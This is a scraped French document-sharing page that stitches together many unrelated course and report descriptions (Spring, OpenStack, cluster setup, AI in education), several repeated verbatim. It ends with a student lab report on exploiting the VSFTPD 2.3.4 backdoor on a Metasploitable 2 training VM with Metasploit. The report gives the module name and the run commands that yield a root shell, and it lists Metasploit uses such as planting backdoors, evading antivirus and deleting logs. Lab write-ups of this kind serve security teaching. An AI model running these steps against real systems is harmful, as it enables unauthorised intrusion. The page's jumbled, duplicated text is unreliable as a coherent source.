exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD
particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2.
Ce Support de cours Spring contient :
- Architecture JEE (Over view)
- Spring Overview
- Spring IOC
- Spring MVC
- Spring Integration (RMI, JaxWS, JaxRS, JMS, JMX,...)
- Spring Security
Bon apprentissage à tous
Revue des différents types de menaces informatiques, analyse de l'évolution des attaques informatiques, étude de cas avec WannaCry, psychologie du marché de la sécurité informatique, évolution de la réglementation
Résumé
Ce document englobe mon projet de fin d’étude réalisé dans le but d’obtenir le diplôme national d’ingénieur en informatique de l’école supérieure privée d’ingénierie et de technologies
(ESPRIT), suite à un stage qui a duré six mois effectués au sein de l’entreprise « DREAM TEK Consulting ». Un stage qui avait principalement pour objectif d’élargir et d’appliquer mes acquis et mes connaissances et de me préparer pour la vie professionnelle.
Ma mission était de concevoir et de réaliser une application web pour le Dashboarding et l’automatisation de la gestion des ressources RH et des produits de l’entreprise.
Ce rapport vous donne une idée bien détaillée sur le projet dans son cadre techniqueet fonctionnel.
********************************************************************
Abstract
The present document contains the details of the work done as the end-of-study project to get the national degree of IT engineering from the private higher school of engineering
and technology (ESPRIT), after a six-month internship in the firm « DREAM TEK Consulting ». An internship that aimed to expand and apply my skills and knowledge.
My mission was to design and implement a web application for dashboarding and automating the management of HR resources and the company products.
This document offers a very detailed idea about the project in both technical and functional scopes.
C'est avec un plaisir non dissimulé que nous libérons nos supports de formation OpenStack en Français. Ceux-ci, présentés sous forme de slides, ont été réalisés dans le cadre de nos activités de formation délivrées à nos clients.
Ils vous permettront de comprendre les enjeux liés au cloud IaaS (Infrastructure as a Service) puis d'installer et de piloter une infrastructure OpenStack, solution leader du marché.
Participants actifs à la communauté OpenStack francophone depuis sa création, nous espérons que cette dernière pourra réutiliser ces supports de formation.
> Des projets OpenStack ? Besoin de formations OpenStack intra- / inter- entreprise ?
Contactez-nous sur http://www.osones.com
Manuel des TP - Atelier de développement web (PHP)
Niveau : Licence informatique - L2
Auteur : Houda TOUKABRI
Bibliothèque ISET Kélibia [TPI11 : 02-01-2018]
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
De nos jours l’internet est devenue une source d’informations (business, réseaux sociaux…), avec des systèmes d’informations qui sont de plus en plus ouverts sur Internet. Ceux-ci présentent quelques failles de sécurité dont la mise en place des mesures sécuritaires devient une condition nécessaire, mais pas suffisante pour se protéger des risques présents sur la toile internet.
Comment interconnecter des réseaux ?
Comment permettre à des réseaux d’échanger des informations et limiter les risques liés à ces échanges ?
Nous avons mis en place un laboratoire de sécurité qui permet de faire des tests et détections d’intrusions. Le travail sait fait en deux parties.
D’abord la mise en place du laboratoire ensuite l’interconnexion avec des sites distants.
Ce Support de cours Spring contient :
- Architecture JEE (Over view)
- Spring Overview
- Spring IOC
- Spring MVC
- Spring Integration (RMI, JaxWS, JaxRS, JMS, JMX,...)
- Spring Security
Bon apprentissage à tous
Revue des différents types de menaces informatiques, analyse de l'évolution des attaques informatiques, étude de cas avec WannaCry, psychologie du marché de la sécurité informatique, évolution de la réglementation
Résumé
Ce document englobe mon projet de fin d’étude réalisé dans le but d’obtenir le diplôme national d’ingénieur en informatique de l’école supérieure privée d’ingénierie et de technologies
(ESPRIT), suite à un stage qui a duré six mois effectués au sein de l’entreprise « DREAM TEK Consulting ». Un stage qui avait principalement pour objectif d’élargir et d’appliquer mes acquis et mes connaissances et de me préparer pour la vie professionnelle.
Ma mission était de concevoir et de réaliser une application web pour le Dashboarding et l’automatisation de la gestion des ressources RH et des produits de l’entreprise.
Ce rapport vous donne une idée bien détaillée sur le projet dans son cadre techniqueet fonctionnel.
********************************************************************
Abstract
The present document contains the details of the work done as the end-of-study project to get the national degree of IT engineering from the private higher school of engineering
and technology (ESPRIT), after a six-month internship in the firm « DREAM TEK Consulting ». An internship that aimed to expand and apply my skills and knowledge.
My mission was to design and implement a web application for dashboarding and automating the management of HR resources and the company products.
This document offers a very detailed idea about the project in both technical and functional scopes.
C'est avec un plaisir non dissimulé que nous libérons nos supports de formation OpenStack en Français. Ceux-ci, présentés sous forme de slides, ont été réalisés dans le cadre de nos activités de formation délivrées à nos clients.
Ils vous permettront de comprendre les enjeux liés au cloud IaaS (Infrastructure as a Service) puis d'installer et de piloter une infrastructure OpenStack, solution leader du marché.
Participants actifs à la communauté OpenStack francophone depuis sa création, nous espérons que cette dernière pourra réutiliser ces supports de formation.
> Des projets OpenStack ? Besoin de formations OpenStack intra- / inter- entreprise ?
Contactez-nous sur http://www.osones.com
Manuel des TP - Atelier de développement web (PHP)
Niveau : Licence informatique - L2
Auteur : Houda TOUKABRI
Bibliothèque ISET Kélibia [TPI11 : 02-01-2018]
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
De nos jours l’internet est devenue une source d’informations (business, réseaux sociaux…), avec des systèmes d’informations qui sont de plus en plus ouverts sur Internet. Ceux-ci présentent quelques failles de sécurité dont la mise en place des mesures sécuritaires devient une condition nécessaire, mais pas suffisante pour se protéger des risques présents sur la toile internet.
Comment interconnecter des réseaux ?
Comment permettre à des réseaux d’échanger des informations et limiter les risques liés à ces échanges ?
Nous avons mis en place un laboratoire de sécurité qui permet de faire des tests et détections d’intrusions. Le travail sait fait en deux parties.
D’abord la mise en place du laboratoire ensuite l’interconnexion avec des sites distants.
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiKhalid EDAIG
Introduction,
En informatique, le parallélisme consiste à mettre en œuvre des architectures permettant de traiter des informations de manière simultanée, ainsi que les algorithmes spécialisés pour celles-ci. Ces techniques ont pour but de réaliser le plus grand nombre d’opérations en un temps le plus petit possible. Afin de pouvoir étudier la programmation parallèle, il faut tout d'abord créer un cluster de machines capable de fonctionner en parallèle. Le but de ce projet est de pouvoir obtenir un tel cluster et j’utilise Le Framework HTCondor pour lancer un programme sur le cluster.
Spectre et Meltdown : quels impacts pour vous et vos clients ?Kiwi Backup
Ce webinar s’adresse à tous les VAR, spécialistes de la distribution informatique, éditeurs de logiciels, hébergeurs, DSI, responsables réseaux, responsables informatiques,…
Nous vous proposons un webinar résolument pratique : 45 minutes pour comprendre ce qui se cache derrière Spectre et Meltdown et savoir comment faire face.
Le Comptoir OCTO - Qu’apporte l’analyse de cycle de vie lors d’un audit d’éco...OCTO Technology
Par Nicolas Bordier (Consultant numérique responsable @OCTO Technology) et Alaric Rougnon-Glasson (Sustainable Tech Consultant @OCTO Technology)
Sur un exemple très concret d’audit d’éco-conception de l’outil de bilan carbone C’Bilan développé par ICDC (Caisse des dépôts et consignations) nous allons expliquer en quoi l’ACV (analyse de cycle de vie) a été déterminante pour identifier les pistes d’actions pour réduire jusqu'à 82% de l’empreinte environnementale du service.
Vidéo Youtube : https://www.youtube.com/watch?v=7R8oL2P_DkU
Compte-rendu :
Le Comptoir OCTO - Équipes infra et prod, ne ratez pas l'embarquement pour l'...OCTO Technology
par Claude Camus (Coach agile d'organisation @OCTO Technology) et Gilles Masy (Organizational Coach @OCTO Technology)
Les équipes infrastructure, sécurité, production, ou cloud, doivent consacrer du temps à la modernisation de leurs outils (automatisation, cloud, etc) et de leurs pratiques (DevOps, SRE, etc). Dans le même temps, elles doivent répondre à une avalanche croissante de demandes, tout en maintenant un niveau de qualité de service optimal.
Habitué des environnements développeurs, les transformations agiles négligent les particularités des équipes OPS. Lors de ce comptoir, nous vous partagerons notre proposition de valeur de l'agilité@OPS, qui embarquera vos équipes OPS en Classe Business (Agility), et leur fera dire : "nous ne reviendrons pas en arrière".
OCTO TALKS : 4 Tech Trends du Software Engineering.pdfOCTO Technology
En cette année 2024 qui s’annonce sous le signe de la complexité, avec :
- L’explosion de la Gen AI
-Un contexte socio-économique sous tensions
- De forts enjeux sur le Sustainable et la régulation IT
- Une archipélisation des lieux de travail post-Covid
Découvrez les Tech trends incontournables pour délivrer vos produits stratégiques.
Ouvrez la porte ou prenez un mur (Agile Tour Genève 2024)Laurent Speyser
(Conférence dessinée)
Vous êtes certainement à l’origine, ou impliqué, dans un changement au sein de votre organisation. Et peut être que cela ne se passe pas aussi bien qu’attendu…
Depuis plusieurs années, je fais régulièrement le constat de l’échec de l’adoption de l’Agilité, et plus globalement de grands changements, dans les organisations. Je vais tenter de vous expliquer pourquoi ils suscitent peu d'adhésion, peu d’engagement, et ils ne tiennent pas dans le temps.
Heureusement, il existe un autre chemin. Pour l'emprunter il s'agira de cultiver l'invitation, l'intelligence collective , la mécanique des jeux, les rites de passages, .... afin que l'agilité prenne racine.
Vous repartirez de cette conférence en ayant pris du recul sur le changement tel qu‘il est généralement opéré aujourd’hui, et en ayant découvert (ou redécouvert) le seul guide valable à suivre, à mon sens, pour un changement authentique, durable, et respectueux des individus! Et en bonus, 2 ou 3 trucs pratiques!
L'IA connaît une croissance rapide et son intégration dans le domaine éducatif soulève de nombreuses questions. Aujourd'hui, nous explorerons comment les étudiants utilisent l'IA, les perceptions des enseignants à ce sujet, et les mesures possibles pour encadrer ces usages.
Constat Actuel
L'IA est de plus en plus présente dans notre quotidien, y compris dans l'éducation. Certaines universités, comme Science Po en janvier 2023, ont interdit l'utilisation de l'IA, tandis que d'autres, comme l'Université de Prague, la considèrent comme du plagiat. Cette diversité de positions souligne la nécessité urgente d'une réponse institutionnelle pour encadrer ces usages et prévenir les risques de triche et de plagiat.
Enquête Nationale
Pour mieux comprendre ces dynamiques, une enquête nationale intitulée "L'IA dans l'enseignement" a été réalisée. Les auteurs de cette enquête sont Le Sphynx (sondage) et Compilatio (fraude académique). Elle a été diffusée dans les universités de Lyon et d'Aix-Marseille entre le 21 juin et le 15 août 2023, touchant 1242 enseignants et 4443 étudiants. Les questionnaires, conçus pour étudier les usages de l'IA et les représentations de ces usages, abordaient des thèmes comme les craintes, les opportunités et l'acceptabilité.
Résultats de l'Enquête
Les résultats montrent que 55 % des étudiants utilisent l'IA de manière occasionnelle ou fréquente, contre 34 % des enseignants. Cependant, 88 % des enseignants pensent que leurs étudiants utilisent l'IA, ce qui pourrait indiquer une surestimation des usages. Les usages identifiés incluent la recherche d'informations et la rédaction de textes, bien que ces réponses ne puissent pas être cumulées dans les choix proposés.
Analyse Critique
Une analyse plus approfondie révèle que les enseignants peinent à percevoir les bénéfices de l'IA pour l'apprentissage, contrairement aux étudiants. La question de savoir si l'IA améliore les notes sans développer les compétences reste débattue. Est-ce un dopage académique ou une opportunité pour un apprentissage plus efficace ?
Acceptabilité et Éthique
L'enquête révèle que beaucoup d'étudiants jugent acceptable d'utiliser l'IA pour rédiger leurs devoirs, et même un quart des enseignants partagent cet avis. Cela pose des questions éthiques cruciales : copier-coller est-il tricher ? Utiliser l'IA sous supervision ou pour des traductions est-il acceptable ? La réponse n'est pas simple et nécessite un débat ouvert.
Propositions et Solutions
Pour encadrer ces usages, plusieurs solutions sont proposées. Plutôt que d'interdire l'IA, il est suggéré de fixer des règles pour une utilisation responsable. Des innovations pédagogiques peuvent également être explorées, comme la création de situations de concurrence professionnelle ou l'utilisation de détecteurs d'IA.
Conclusion
En conclusion, bien que l'étude présente des limites, elle souligne un besoin urgent de régulation. Une charte institutionnelle pourrait fournir un cadre pour une utilisation éthique.
De l'IA comme plagiat à la rédaction d'une « charte IA » à l'université
Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4
1. 1
SECURITE
Département Génie d’Informatique
Faculté des Sciences et Techniques
TANGER
Rapport
Metasploit et Metasploitable 2
Sécurité
Le 10/12/2018
Master Système Informatique et Mobile
Réalisé par : Encadré par :
EDAIG KHALID. Mr. BOUDHIR Anouar
2. 2
SECURITE
SOMMAIRE
1. INTRODUCTION............................................................................................................................................3
2. C’EST QUOI METASPLOIT........................................................................................................................... 3
3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3
4. C’EST QUOI MATASPLOITABLE................................................................................................................3
5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4
5.1. Metasploit ..................................................................................................................................................................... 4
6. METASPLOITABLE 2 ...................................................................................................................................6
7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7
8. CONCLUSION .................................................................................................................................................9
3. 3
SECURITE
1. Introduction
Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD
particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2.
2. C’est quoi Metasploit
Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet
de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de
programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby.
Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes
informatiques afin de les protéger, ou par les hackers à des fins de piratage.
3. Qu’est-ce que peut faire avec Metasploit
Le Framework permet de faire énormément de chose comme :
Le scan et collecte l’ensemble d’informations sur une machine
Repérage et l’exploitation des vulnérabilités
Escalade de privilèges et vol de données
Installation d’une porte dérobée
Fuzzing
Echapper à l’antivirus
Suppression des logs et des traces
4. C’est quoi Matasploitable
Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette
machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et
appliquer des techniques de test de pénétration courantes.
4. 4
SECURITE
5. Installation de Metasploit et Metasploitable2
5.1. Metasploit
Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite.
Bien sûr, Kali est fourni avec la version gratuite.
Figure 1 : les machines virtuelle kali linux et Metasploitable2
Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit,
payload…etc
Qu’est-ce qu’un exploit avec Metasploit
C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On
peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable
Qu’est ce qu’un Payload
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine
d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore
l’ouverture d’une session VNC.
Qu’est ce qu’un msfconsole
Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit
d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement
sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier
transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits.
Vocabulaire Réseau important
LHOST : lhost est l’adresse IP de l’attaquant
LPORT : C’est le port que vous souhaitez utiliser
RHOST : Ceci est l’adresse IP de la machine victime
RPORT : Le numéro de port de la victime.
5. 5
SECURITE
On va commencer avec Metasploit
Démarrez le service Kali PostgreSQL.
Démarrez le service Kali Metasploit.
Démarrer la msfconsole.
6. 6
SECURITE
Afficher le status de db
afficher les différents types d’exploits
6. Metasploitable 2
Connexion à la machine vm Matasloitable 2
Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
7. 7
SECURITE
7. Metasploitable 2 – VSFTPD
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit
Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de
donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.
service postgresql start
msfdb init
Msfconsole
Afficher le status de connection à la DB
msf > db_statut
Bien connecté.
Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application
VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > show options : pour afficher les différentes options
8. 8
SECURITE
Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante.
msf> set RHOST [IP CIBLE]
Après on va exécuter par la commande run
msf> run
Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière.
-ls /etc pour afficher le contenu du dossier etc.
-on va créer un dossier ‘khalid’
9. 9
SECURITE
8. Conclusion
J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service
VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le
terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous
rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que
la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.